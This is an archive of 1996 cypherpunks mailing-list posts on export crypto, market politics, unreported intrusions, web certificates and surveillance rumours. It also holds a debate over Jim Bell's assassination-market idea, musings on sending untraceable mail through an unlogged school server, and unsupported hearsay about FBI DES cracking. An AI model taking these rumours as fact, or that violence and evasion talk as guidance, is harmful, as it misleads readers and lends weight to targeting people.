Sameer Parekh					Voice:   510-601-9777x3
Community ConneXion, Inc.			FAX:     510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.net/ (or login as "guest")		sameer@c2.net




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: minow@apple.com (Martin Minow)
Date: Fri, 7 Jun 1996 20:25:27 +0800
To: cypherpunks@toad.com
Subject: Re: Norton Eyes only
Message-ID: <v02140b05addcfddf88c4@[17.202.12.102]>
MIME-Version: 1.0
Content-Type: text/plain


>
>Has anyone been able to analyse the 'patent pending', 'on-the-fly'
>encryption in Norton's 'For your eyes only'?
>

Why bother? If it's freely exportable, we have a good estimate of
it's cryptographic strength :-)

Martin.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Fri, 7 Jun 1996 12:11:25 +0800
To: cypherpunks@toad.com
Subject: Re: whitehouse web incident, viva la web revolution
In-Reply-To: <199606051821.OAA12450@jekyll.piermont.com>
Message-ID: <v03006f19addcd0b35037@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


At 4:18 PM -0400 6/5/96, hallam@Etna.ai.mit.edu wrote:

> ObCrypto: Perry is only able to make allegations because the
> financial markets are to a degree open. If anoymous cash takes
> off and anonymous derivatives follow won't it make it easier to
> conceal the type of dealings Perry alledges?

Ah. Another bugbear emerges from the monster closet... <sfx: CREEEAAAAAK!!!!>

Don't worry, Phill!

I've put Jell-O all over the kitchen floor, and set the sofa on fire, too!

That should hold it off until you can get under the magic covers!


lub-DUB. lub-DUB. lub-DUB. lub-DUB. lub-DUB. ...



I suppose it depends on what you call "open", eh, Phill?

If by "open", you mean financial markets where, as Milton Freedman says,
each new regulation raises the cost of entry and protects the surviving
firms by killing their smaller competion with red tape, then we have "open"
markets.

If by "open", you mean that people can't purchase the attention of their
favorite politician fair and square, without having to play zero-sum games
with barnyard animals, then we have "open" markets. ;-).

If by "open", you mean capital markets where we have industrial economies
of scale because they're based on industrial communications technology, and
thus no competition at all, then we have "open" markets.

If by "open", you mean we have an ever-decreasing noose of surveillance,
both by nation-states and by large government-created (see Fredman, above)
oligopolies, then we have "open" markets.


Nothing personal, Phill, but it does seem like it's more a question of what
you're afraid of, than what *is*, right?


Cheers,
Bob Hettinga



Now, where exactly *did* I put that chicken heart, anyway...

lub-DUB. lub-DUB. lub-DUB. lub-DUB. lub-DUB. ...


-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"If they could 'just pass a few more laws',
  we would all be criminals."    --Vinnie Moscaritolo
The e$ Home Page: http://www.vmeng.com/rah/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Jean-Francois Avon" <jf_avon@citenet.net>
Date: Fri, 7 Jun 1996 16:24:06 +0800
To: David Rosoff <jimbell@pacifier.com>
Subject: Re: [Off-Topic]  "Curfews"
Message-ID: <9606061850.AA10939@cti02.citenet.net>
MIME-Version: 1.0
Content-Type: text/plain


On  6 Jun 96 at 11:19, jim bell wrote:


> >>I _do_ believe, however, that the number of people unjustifiably
> >>targeted will be rather low. <snip>  Retaliation is possible, in
> >> that case.

Sorry Jim, I did not get that at all in the past.  I assumed a 
context where the inner workings of AP would not be well understood 
by the population while here, you seems to indicate that everybody 
would operate under the threat / deterrance of mutual anihilation 
principle.

A argued that an impulsive guy might target somebody unjustifiably 
while I overlooked that he could think twice before doing so.  But by 
his nature, being a violent or thug at heart, he will understand this 
"peace based on threat" maybe even better than a pacifist at heart.  
So, my arguments might not stand.  

Have any constructive comments? (hey, just play devil's advocate from 
time to time :)

Ciao

JFA


 DePompadour, Societe d'Importation Ltee; Limoges porcelain, silverware and crystal
 JFA Technologies, R&D consultants: physicists, technologists and engineers.

 PGP keys at: http://w3.citenet.net/users/jf_avon
 ID# C58ADD0D : 529645E8205A8A5E F87CC86FAEFEF891 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: qut@netcom.com (harman.david)
Date: Fri, 7 Jun 1996 21:22:27 +0800
To: rich@c2.org)
Subject: Re: You're a Twit! [ ]   [And, a jackass]
In-Reply-To: <199606062134.OAA20430@Networking.Stanford.EDU>
Message-ID: <199606062147.OAA13396@netcom2.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


> The message with headers below has been received and set aside for careful
> handling by carbon-based units. Thank you so much for your contribution to
> global understanding.
> 
> Love,
> Rich's Twit Acknowledger
> 
> >From qut@netcom.com Thu Jun  6 14:34:48 1996
> Received: from boron.Stanford.EDU (boron.Stanford.EDU [36.56.0.10]) by Networking.Stanford.EDU (8.7.5/8.6.6) with ESMTP id OAA20426 for <llurch@networking.stanford.edu>; Thu, 6 Jun 1996 14:34:48 -0700
> Received: from netcom2.netcom.com (qut@netcom2.netcom.com [192.100.81.108]) by boron.Stanford.EDU (8.7.5/8.7.3) with SMTP id OAA16925 for <llurch@stanford.edu>; Thu, 6 Jun 1996 14:34:45 -0700 (PDT)
> Received: (from qut@localhost) by netcom2.netcom.com (8.6.13/Netcom)
> 	id OAA12280; Thu, 6 Jun 1996 14:34:46 -0700
> Date: Thu, 6 Jun 1996 14:34:46 -0700
> From: qut@netcom.com (harman.david)
> Message-Id: <199606062134.OAA12280@netcom2.netcom.com>
> To: llurch@stanford.edu

Oh, did I miss the Cypherpunk announcment or something?
Do I care?
Isn't cypherpunking rather elitist?
Isn't elitism a signatory of worthless knowledge?

Hey, look at me, I'm elite!



-- 
Love,
Qut@netcom.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lile Elam <elam@art.net>
Date: Fri, 7 Jun 1996 21:11:59 +0800
To: cypherpunks@toad.com
Subject: Senate Staff Report...
Message-ID: <199606062147.OAA10230@art.net>
MIME-Version: 1.0
Content-Type: text/plain



Hi all,

Does anyone know the location on the web of the Senate staff report
that was presented on some Wednesday? I read an article about it
on the sjmercury that says people with computers do not consider
security a high priority...

I am curous what else the report says...

thanks,

-lile





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Fri, 7 Jun 1996 12:28:24 +0800
To: cypherpunks@toad.com
Subject: DCSB Cocktails Over Back Bay
Message-ID: <v03006f22addcde1e772d@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain



--- begin forwarded text


Date: 6 Jun 96 10:13:48 EDT
From: "Julie Rackliffe" <RACKLIFFE@tcm.org>
Subject: DCSB Cocktails Over Back Bay
To: "dcsb" <dcsb@ai.mit.edu>
Sender: bounce-dcsb@ai.mit.edu
Precedence: bulk
Reply-To: "Julie Rackliffe" <RACKLIFFE@tcm.org>

Greetings!

As those who attended yesterday's lunch already know, We Have A Date!

I am simply delighted to announce that Open Software Foundation has generously
agreed to sponsor our first ever cocktail party for the Digital Commerce
Society
of Boston. I promises to be a memorable evening and I hope that you will
plan to
come, and please feel free to introduce a friend to this unique group. Our
intention is that this event should be used as a networking opportunity in
addition to getting some more people interested in DCSB (and, of course,
expanding our mailing list!)

So, here's the specifics:

When:	Thursday, June 20, 1996
	5-8 pm

Where: 	The Harvard Club, One Federal Street, 38th floor
	in The Lounge (sunset over the Back Bay will be featured!)

	Hot and Cold Hors D'oeuvres ala The Harvard Club
	and cool libations compliments of OSF and DCSB.



What's the Catch?- No Catch! Just RSVP to me before June 17


Do Come!

Julie Rackliffe					The Computer Museum
Annual Fund/Membership Manager			300 Congress St, Boston 02210
rackliffe@tcm.org  				617.426.2800 X432
********************************************************************************
The Walk-Through Computer 2000 is open! This is a "must see"!
Museum Membership:SR/STU $25...IND $35...FAM $50...NON-PROFIT $250...LIB $500
Web Site: http://www.tcm.org




~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
To unsubscribe from this list, send a letter to: Majordomo@ai.mit.edu
In the body of the message, write:  unsubscribe dcsb
Or, to subscribe,           write:  subscribe dcsb
If you have questions, write to me at Owner-DCSB@ai.mit.edu

--- end forwarded text



-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"If they could 'just pass a few more laws',
  we would all be criminals."    --Vinnie Moscaritolo
The e$ Home Page: http://www.vmeng.com/rah/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Fri, 7 Jun 1996 21:06:02 +0800
To: jya@pipeline.com (John Young)
Subject: Re: InfoSec Spin
In-Reply-To: <199606061713.RAA23573@pipe1.t2.usa.pipeline.com>
Message-ID: <199606061933.PAA15452@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



John Young writes:
>       In cyberspace, where hackers are finding commercial 
>       computer systems easy prey, businesses are choosing to 
>       hire free-lance security teams rather than involve the 
>       law. A Senate subcommittee heard Wednesday from experts 
>       who described how businesses, concerned over negative 
>       publicity, avoid reporting hacker assaults on their 
>       networked computer system.

Shocking, that.

Of course this happens. I mean, its part of my bread and
butter. However, this shouldn't be surprising -- businesses have
ALWAYS operated this way, whether on shoplifting or catching employees
with their hands in the kitty or hacking. It is not only a question of
avoiding embarassment, but also a question of having different
interests from law enforcement. The company wants safety, not
convictions. They don't have to worry about warrants or absolute proof
-- they only have to worry about their actions being defensible in a
civil suit. This makes their operations in such cases very different indeed.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jonathon <grafolog@netcom.com>
Date: Fri, 7 Jun 1996 12:05:45 +0800
To: hallam@Etna.ai.mit.edu
Subject: Re: whitehouse web incident, viva la web revolution
In-Reply-To: <9606052133.AA03412@Etna.ai.mit.edu>
Message-ID: <Pine.3.89.9606061558.A14010-0100000@netcom9>
MIME-Version: 1.0
Content-Type: text/plain


	Phill:


On Wed, 5 Jun 1996 hallam@Etna.ai.mit.edu wrote:

> You still don't understand, the $1000 is not the stake, it is merely the 
> deposit. The stake is Hillary's entire net worth, that is what she is betting 

	Call it what you will, the odds of 25 consecutive contracts
	all showing a profit are miniscle, except under one set of
	circumstances.  <<  It is something like 1 chance in
	15 511 210 000 000 000 000 000 000.  >>

	You expect us to seriously believe that somebody with
	virtually no knowledge of futures trading would not end up
	having to meet at least one margin call, in 25 trades?
	
> trade that one would expect to make in an underwritting capacity 
> for a commodity market. 
> Steady profits on contracts which generally pay off. 

	Futures trading on contracts generally show a profit?
	I guess you are talking about the person who sets up 
	the trades, and takes a commission on the trades, 
	regardless of who makes, or ( usually ) loses money. 
	
> So you think that the Republican's in Washington haven't figured out
> what Perry Metzger has? 

	Statistical proof is only accepted in academia.  Depending
	upon your POV, this may or may not be a good thing, when
	one is facing civil, or criminal charges.  

	Finding proof for either civil or criminal charges is a 
	slightly different matter.

> the US does. I have friends in both parties who have left the Washington 
> political scene because they don't think the game is worth the candle. 

	The US Media is slightly less freindly towards politicians, 
	than other countries.

	US Politicians are freindlier to each other,
	than politicians in other countries are. 

        xan

        jonathon
        grafolog@netcom.com



**********************************************************************
*								     *
*	Opinions expressed don't necessarily reflect my own views.   *
*								     *
*	There is no way that they can be construed to represent      *
*	any organization's views.				     *
*								     *
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
*								     *
*       http://members.tripod.com/~graphology/index.html             *
*								     *
***********************************************************************






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Fri, 7 Jun 1996 21:21:35 +0800
To: Cypherpunks <cypherpunks@toad.com>
Subject: WWW servers.
Message-ID: <Pine.SUN.3.91.960606161633.1329A-100000@polaris>
MIME-Version: 1.0
Content-Type: text/plain



Does there currently exist a system which permits webservers to restrict 
access to clients who have a given certification?

What is the current certification practice?

How easy is it to certify a given client?

Are webserver certifications sufficently secure today?

What are the best servers to use for secure web pages and certification 
currently in the United States?

---
My preferred and soon to be permanent e-mail address:unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information
Opp. Counsel: For all your expert testimony needs: jimbell@pacifier.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Chris Adams" <adamsc@io-online.com>
Date: Fri, 7 Jun 1996 21:05:11 +0800
To: "cypherpunks" <cypherpunks@toad.com>
Subject: Fwd: Re: INteresting tidbit
Message-ID: <199606070507.WAA20878@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


==================BEGIN FORWARDED MESSAGE==================
>From: "Chris Adams" <adamsc@io-online.com>
>To: "cypherpunks" <cypherpunks@toad.com>
>Date: Wed, 29 May 96 22:36:17 
>Reply-To: "Chris Adams" <adamsc@io-online.com>
>Priority: Normal
>X-Mailer: PMMail 1.5 UNREGISTERED SHAREWARE
>MIME-Version: 1.0
>Content-Type: text/plain; charset="us-ascii"
>Content-Transfer-Encoding: 7bit
>Subject: Re: INteresting tidbit
>

>On the Encryption note, and I swear not along the lines of the 'DOJ' 
>and 'FBI Snooping' Big-Brother events, I heard another story recently.
>
># begin story
>
>A person working on the MBONE project did an unannounced experiment
>across the internet using Triple-DES for MBONE, and the very next day, 
>'ATF' agents knocked on his door and warned him against exporting 
>munitions.  The experimentor was shaken by the fact that agents 
>approached him so quickly after the experiment.
>
># end story
>
>Extrapolations of fact:
>   1.   Internet traffic is monitored.
>   2.   The ability to snoop for encrypted traffic is present
>   3.   The ability to identify encryption levels is present
>        (How else can they differentiate DES-1 from DES-3?)
>   4.   The ability to crack DES-1 in near real-time mode is present.
>        (See above).
First, this has been loosely confirmed for ages. Someone was mentioning
that FBI offices 
supposedly have software that (on a 486) can crack a DES-1 key in under
an hour. Multiply * 
modern high capacity computers = problem.  However, this does not
nessesarily follow from 
#3. First off, you could probably tell the encryption used from a file
format; the software 
on the other end has to know what it's getting. Secondly, you could
probably tell quite a 
lot about what was used by some intense analysis.
Finally, if their software cannot read it and analysis suggested it was
more than DES-1 
then they might go after someone w/o being able to read the document in
question.
>   5.   If above=true, then Feds dropping the Zimmerman PGP case probably
>        also points to it also being crackable in a similar manner.
Not necessarily. This freemen issue shows that the FBI is getting gunshy
about bad 
publicity, which they were getting.
>   6.   Using encryption only flags traffic for capture and decryption, 
>        using strong encryption makes you all that more interesting.
Sounds like the old argument for encrypting everything...

>Sorry, couldn't resist.  I'll try not to start a threads about 
>electro-plasma propulsion craft at Area 51, metallic-ceramic skin 
>and pulse-jets on the Aurora spy plane, heat-imaging video cameras 
>on satellites and planes that can watch you through your houses' roof, 
>etc.  :)

What??? Now you're going to tell us X-Files is just a TV show? <g>

This Message Was Sent With An UNREGISTERED Version Of PMMail.  
Please Encourage Its Author To Register Their Copy Of PMMail.  
For More Information About PMMail And SouthSide Software's Other 
Products, Contact http://www.southsoft.com.



===================END FORWARDED MESSAGE===================

/* From Chris Adams <adamsc@io-online.com> on a Warped PC running a proudly unregistered (for now) PMMAIL 1.5!
The Enigman Group - We do Web Pages! */

This Message Was Sent With An UNREGISTERED Version Of PMMail.  
Please Encourage Its Author To Register Their Copy Of PMMail.  
For More Information About PMMail And SouthSide Software's Other 
Products, Contact http://www.southsoft.com.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Chris Adams" <adamsc@io-online.com>
Date: Fri, 7 Jun 1996 20:10:10 +0800
To: "cypherpunks" <cypherpunks@toad.com>
Subject: Fwd: Re: Clipper III analysis
Message-ID: <199606070507.WAA20874@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


==================BEGIN FORWARDED MESSAGE==================
>From: "Chris Adams" <adamsc@io-online.com>
>To: "cypherpunks" <cypherpunks@toad.com>
>Date: Thu, 30 May 96 01:16:32 
>Reply-To: "Chris Adams" <adamsc@io-online.com>
>Priority: Normal
>X-Mailer: PMMail 1.5 UNREGISTERED SHAREWARE
>MIME-Version: 1.0
>Content-Type: text/plain; charset="us-ascii"
>Content-Transfer-Encoding: 7bit
>Subject: Re: Clipper III analysis
>

On 29 May 1996 14:53:30 pdt, tcmay@got.net wrote:

>>        A good Questioned Document Examiner will be able to demonstrate
>>        that the signed document in question was not authored by Joe
>>        Blow, even if it contains his digital signature.
>
>I was of course talking about digital signatures, not handwritten signatures.
>
>I would be very interested to hear how a "Questioned Document Examiner" can
>possibly determine that a digital signature was not applied by a particular
>person.

I believe he was referring to document analysis. By closely comparing a
questionable work 
with those of known authorship, a skilled analyst can hopefully find
enough 
[dis]similarities to say whether a document was authored by a given
person.

This Message Was Sent With An UNREGISTERED Version Of PMMail.  
Please Encourage Its Author To Register Their Copy Of PMMail.  
For More Information About PMMail And SouthSide Software's Other 
Products, Contact http://www.southsoft.com.



===================END FORWARDED MESSAGE===================


This Message Was Sent With An UNREGISTERED Version Of PMMail.  
Please Encourage Its Author To Register Their Copy Of PMMail.  
For More Information About PMMail And SouthSide Software's Other 
Products, Contact http://www.southsoft.com.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Chris Adams" <adamsc@io-online.com>
Date: Fri, 7 Jun 1996 19:29:12 +0800
To: "cypherpunks" <cypherpunks@toad.com>
Subject: Fwd: Re: [crypto] crypto-protocols for trading card gam
Message-ID: <199606070508.WAA20910@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


==================BEGIN FORWARDED MESSAGE==================
>From: "Chris Adams" <adamsc@io-online.com>
>To: "cypherpunks" <cypherpunks@toad.com>
>Date: Thu, 30 May 96 01:22:36 
>Reply-To: "Chris Adams" <adamsc@io-online.com>
>Priority: Normal
>X-Mailer: PMMail 1.5 UNREGISTERED SHAREWARE
>MIME-Version: 1.0
>Content-Type: text/plain; charset="us-ascii"
>Content-Transfer-Encoding: 7bit
>Subject: Re: [crypto] crypto-protocols for trading card gam
>

On 29 May 1996 18:57:58 pdt, alanh@infi.net wrote:

>What _did_   Solitaire do for Windows 3.1?   Distract the attention of 
>the unwashed masses away from the actual merits of the beast?

Actually, I believe it covered a direct lack thereof.
(Of course, you could have been intending this in a heavily sarcastic
form. In that case, I 
agree entirely)

This Message Was Sent With An UNREGISTERED Version Of PMMail.  
Please Encourage Its Author To Register Their Copy Of PMMail.  
For More Information About PMMail And SouthSide Software's Other 
Products, Contact http://www.southsoft.com.



===================END FORWARDED MESSAGE===================

/* From Chris Adams <adamsc@io-online.com> on a Warped PC running a proudly unregistered (for now) PMMAIL 1.5!
The Enigman Group - We do Web Pages! */

This Message Was Sent With An UNREGISTERED Version Of PMMail.  
Please Encourage Its Author To Register Their Copy Of PMMail.  
For More Information About PMMail And SouthSide Software's Other 
Products, Contact http://www.southsoft.com.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Chris Adams" <adamsc@io-online.com>
Date: Fri, 7 Jun 1996 21:08:01 +0800
To: "cypherpunks" <cypherpunks@toad.com>
Subject: Fwd: Re: forged addresses
Message-ID: <199606070507.WAA20872@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


==================BEGIN FORWARDED MESSAGE==================
>From: "Chris Adams" <adamsc@io-online.com>
>To: "cypherpunks" <cypherpunks@toad.com>
>Date: Thu, 30 May 96 01:32:54 
>Reply-To: "Chris Adams" <adamsc@io-online.com>
>Priority: Normal
>X-Mailer: PMMail 1.5 UNREGISTERED SHAREWARE
>MIME-Version: 1.0
>Content-Type: text/plain; charset="us-ascii"
>Content-Transfer-Encoding: 7bit
>Subject: Re: forged addresses
>

On 29 May 1996 19:38:16 pdt, nobody@nowher.com wrote:

>Hi, I'm not sure if there was ever a thread on this, but I was wondering if 
>anyone can determine your real email address, if you were to fake it to your 
>email client.
>
>I hope that this doesn't offend anyone, since this is a high traffic list, but 
>I was wondering if this would work.  To try it out, I setup my client to think 
>I was someone else, and sent myself an email.  I could only figure out what 
>ISP it came from.
>
>What I would like to know is, can any of the experts on this list determine my 
>address from the header of this post??
I didn't receive anything except your nobody@... address.
>again, if this is something that I shouldn't have done, just let me know, and 
>it won't happen again.
>
 Hmmm... I'm going to have to play around with this. I can get outbound
email access 
through my school district's mailserver simply by filling in the
appropriate fields in 
netscape (we have a WAN hooked up to a T1).  It would seem to me that
this would be rather 
secure for several reasons, if for no other than that NO logging is
made... In a large 
district, like mine (probably 10-15 thousand potential users), I doubt
they would have the 
resources to track any of the 100 or so Internet machines on my campus
alone, even if they 
could tell it came from here.

This Message Was Sent With An UNREGISTERED Version Of PMMail.  
Please Encourage Its Author To Register Their Copy Of PMMail.  
For More Information About PMMail And SouthSide Software's Other 
Products, Contact http://www.southsoft.com.



===================END FORWARDED MESSAGE===================

/* From Chris Adams <adamsc@io-online.com> on a Warped PC running a proudly unregistered (for now) PMMAIL 1.5!
The Enigman Group - We do Web Pages! */

This Message Was Sent With An UNREGISTERED Version Of PMMail.  
Please Encourage Its Author To Register Their Copy Of PMMail.  
For More Information About PMMail And SouthSide Software's Other 
Products, Contact http://www.southsoft.com.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Chris Adams" <adamsc@io-online.com>
Date: Fri, 7 Jun 1996 23:42:00 +0800
To: "cypherpunks" <cypherpunks@toad.com>
Subject: Fwd: [Fwd: Welcome!]
Message-ID: <199606070507.WAA20877@toad.com>
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="Boundary..3942.1071713584.multipart/mixed"

--Boundary..3942.1071713584.multipart/mixed
Content-Type: text/plain
Content-Transfer-Encoding: 7bit

==================BEGIN FORWARDED MESSAGE==================
>From: "Chris Adams" <adamsc@io-online.com>
>To: "Jerry Kuhn" <jerry.kuhn@f0.n206.z1.fidonet.org>,
>	"Gary Orthuber" <nccorthu@rain.org>
>Date: Tue, 28 May 96 00:01:11 
>Reply-To: "Chris Adams" <adamsc@io-online.com>
>Priority: Normal
>X-Mailer: PMMail 1.5 UNREGISTERED SHAREWARE
>MIME-Version: 1.0
>Content-Type: multipart/mixed; boundary="_=_=_=IMA.BOUNDARY.DS3KHZ138764=_=_=_"
>Subject: Fwd: [Fwd: Welcome!]
>

==================BEGIN FORWARDED MESSAGE==================
>Message-ID: <1082295506@bbs.io-online.com>
>From: adamsc@io-online.com
>MIME-Version: 1.0
>Content-Type: multipart/mixed; boundary="zzzz408284d220bc8563io-online.cozzzz"
>To: Adamsc
>Date: 28 May 1996 12:31:14 pdt
>Subject: [Fwd: Welcome!]
>


This message has been generated solely to deliver this file attachment.
This file attachment was originally included in another message, which
had multiple file attachments.

This message was automatically generated.




===================END FORWARDED MESSAGE===================


This Message Was Sent With An UNREGISTERED Version Of PMMail.  
Please Encourage Its Author To Register Their Copy Of PMMail.  
For More Information About PMMail And SouthSide Software's Other 
Products, Contact http://www.southsoft.com.



===================END FORWARDED MESSAGE===================

/* From Chris Adams <adamsc@io-online.com> on a Warped PC running a proudly unregistered (for now) PMMAIL 1.5!
The Enigman Group - We do Web Pages! */

This Message Was Sent With An UNREGISTERED Version Of PMMail.  
Please Encourage Its Author To Register Their Copy Of PMMail.  
For More Information About PMMail And SouthSide Software's Other 
Products, Contact http://www.southsoft.com.



--Boundary..3942.1071713584.multipart/mixed
Content-Type: application/octet-stream; name="bin00000.bin"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="bin00000.bin"
Content-Description: "FILE.EXT"

PiBJZiB5b3UgYXJlIHJlYWRpbmcgdGhpcyB0ZXh0LCB0aGVuIHlvdXIgbWFp
bCByZWFkZXIgZG9lcyBub3Qgc3VwcG9ydA0KPiB0aGUgTUlNRSAoTXVsdGlw
dXJwb3NlIGludGVybmV0IE1haWwgRXh0ZW5zaW9ucykgc3RhbmRhcmQuICBU
byB0YWtlDQo+IGZ1bGwgYWR2YW50YWdlIG9mIHRoZSBmZWF0dXJlcyBvZiB0
aGlzIG1lc3NhZ2UsIHlvdSBuZWVkIHRvIHVwZ3JhZGUNCj4geW91ciBtYWls
ZXIgdG8gYSBNSU1FIHYxLjAgY29tcGxpYW50IHBhY2thZ2UuICBTb21lIHBh
cnRzIG9mIHRoaXMNCj4gbWVzc2FnZSBtYXkgYmUgaW4gYSBodW1hbiByZWFk
YWJsZSBmb3JtLg0KDQoNCi0tenp6ejQwODI4NGNiMjBiYzYzNDZpby1vbmxp
bmUuY296enp6DQpDb250ZW50LVR5cGU6IHRleHQvcGxhaW4NCkNvbnRlbnQt
VHJhbnNmZXItRW5jb2Rpbmc6IDdiaXQNCg0KaHR0cDovL3d3dy5pdXMuY3Mu
Y211LmVkdS9oZWxwL1Byb2dyYW1taW5nL2Mtam9rZS5odG1sDQoNCg0KDQot
LXp6eno0MDgyODRjYjIwYmM2MzQ2aW8tb25saW5lLmNvenp6eg0KQ29udGVu
dC1UeXBlOiB0ZXh0L2h0bWw7IG5hbWU9IkMtSk9LRS5IVE0iDQpDb250ZW50
LVRyYW5zZmVyLUVuY29kaW5nOiA3Yml0DQpDb250ZW50LURpc3Bvc2l0aW9u
OiBhdHRhY2htZW50OyBmaWxlbmFtZT0iQy1KT0tFLkhUTSINCg0KPEJBU0Ug
SFJFRj0iaHR0cDovL3d3dy5pdXMuY3MuY211LmVkdS9oZWxwL1Byb2dyYW1t
aW5nL2Mtam9rZS5odG1sIj4NCg0KPGh0bWw+IDxoZWFkPg0KPHRpdGxlPkNS
RUFUT1JTIEFETUlUIFVOSVgsIEMgSE9BWDwvdGl0bGU+DQo8L2hlYWQ+DQoN
Cjxib2R5Pg0KPGgxPkNSRUFUT1JTIEFETUlUIFVOSVgsIEMgSE9BWDwvaDE+
DQpDT01QVVRFUldPUkxEIDEgQXByaWwNCjxocj4NCg0KPHA+DQpJbiBhbiBh
bm5vdW5jZW1lbnQgdGhhdCBoYXMgc3R1bm5lZCB0aGUgY29tcHV0ZXIgaW5k
dXN0cnksIEtlbiBUaG9tcHNvbiwNCkRlbm5pcyBSaXRjaGllIGFuZCBCcmlh
biBLZXJuaWdoYW4gYWRtaXR0ZWQgdGhhdCB0aGUgVW5peCBvcGVyYXRpbmcN
CnN5c3RlbSBhbmQgQyBwcm9ncmFtbWluZyBsYW5ndWFnZSBjcmVhdGVkIGJ5
IHRoZW0gaXMgYW4gZWxhYm9yYXRlIEFwcmlsDQpGb29scyBwcmFuayBrZXB0
IGFsaXZlIGZvciBvdmVyIDIwIHllYXJzLiAgU3BlYWtpbmcgYXQgdGhlIHJl
Y2VudA0KVW5peFdvcmxkIFNvZnR3YXJlIERldmVsb3BtZW50IEZvcnVtLCBU
aG9tcHNvbiByZXZlYWxlZCB0aGUgZm9sbG93aW5nOg0KPC9wPg0KDQo8cD4N
CmBgSW4gMTk2OSwgQVQmYW1wO1QgaGFkIGp1c3QgdGVybWluYXRlZCB0aGVp
ciB3b3JrIHdpdGggdGhlDQpHRS9Ib25leXdlbGwvQVQmYW1wO1QNCk11bHRp
Y3MgcHJvamVjdC4gQnJpYW4gYW5kIEkgaGFkIGp1c3Qgc3RhcnRlZCB3b3Jr
aW5nIHdpdGggYW4gZWFybHkNCnJlbGVhc2Ugb2YgUGFzY2FsIGZyb20gUHJv
ZmVzc29yIE5pY2hsYXVzIFdpcnRoJ3MgRVRIIGxhYnMgaW4NClN3aXR6ZXJs
YW5kIGFuZCB3ZSB3ZXJlIGltcHJlc3NlZCB3aXRoIGl0cyBlbGVnYW50IHNp
bXBsaWNpdHkgYW5kDQpwb3dlci4gRGVubmlzIGhhZCBqdXN0IGZpbmlzaGVk
IHJlYWRpbmcgYEJvcmVkIG9mIHRoZSBSaW5ncycsIGENCmhpbGFyaW91cyBO
YXRpb25hbCBMYW1wb29uIHBhcm9keSBvZiB0aGUgZ3JlYXQgVG9sa2llbiBg
TG9yZCBvZiB0aGUNClJpbmdzJyB0cmlsb2d5LiBBcyBhIGxhcmssIHdlIGRl
Y2lkZWQgdG8gZG8gcGFyb2RpZXMgb2YgdGhlIE11bHRpY3MNCmVudmlyb25t
ZW50IGFuZCBQYXNjYWwuIERlbm5pcyBhbmQgSSB3ZXJlIHJlc3BvbnNpYmxl
IGZvciB0aGUgb3BlcmF0aW5nDQplbnZpcm9ubWVudC4gV2UgbG9va2VkIGF0
IE11bHRpY3MgYW5kIGRlc2lnbmVkIHRoZSBuZXcgc3lzdGVtIHRvIGJlIGFz
DQpjb21wbGV4IGFuZCBjcnlwdGljIGFzIHBvc3NpYmxlIHRvIG1heGltaXpl
IGNhc3VhbCB1c2VycycgZnJ1c3RyYXRpb24NCmxldmVscywgY2FsbGluZyBp
dCBVbml4IGFzIGEgcGFyb2R5IG9mIE11bHRpY3MsIGFzIHdlbGwgYXMgb3Ro
ZXIgbW9yZQ0KcmlzcXVlIGFsbHVzaW9ucy4gVGhlbiBEZW5uaXMgYW5kIEJy
aWFuIHdvcmtlZCBvbiBhIHRydWx5IHdhcnBlZA0KdmVyc2lvbiBvZiBQYXNj
YWwsIGNhbGxlZCBgQScuIFdoZW4gd2UgZm91bmQgb3RoZXJzIHdlcmUgYWN0
dWFsbHkNCnRyeWluZyB0byBjcmVhdGUgcmVhbCBwcm9ncmFtcyB3aXRoIEEs
IHdlIHF1aWNrbHkgYWRkZWQgYWRkaXRpb25hbA0KY3J5cHRpYyBmZWF0dXJl
cyBhbmQgZXZvbHZlZCBpbnRvIEIsIEJDUEwgYW5kIGZpbmFsbHkgQy4gV2Ug
c3RvcHBlZA0Kd2hlbiB3ZSBnb3QgYSBjbGVhbiBjb21waWxlIG9uIHRoZSBm
b2xsb3dpbmcgc3ludGF4Og0KPC9wPg0KDQo8cHJlPg0KZm9yKDtQKCJcbiIp
LFItO1AoInwiKSlmb3IoZT1DO2UtO1AoIl8iKygqdSsrLzgpJTIpKVAoInwg
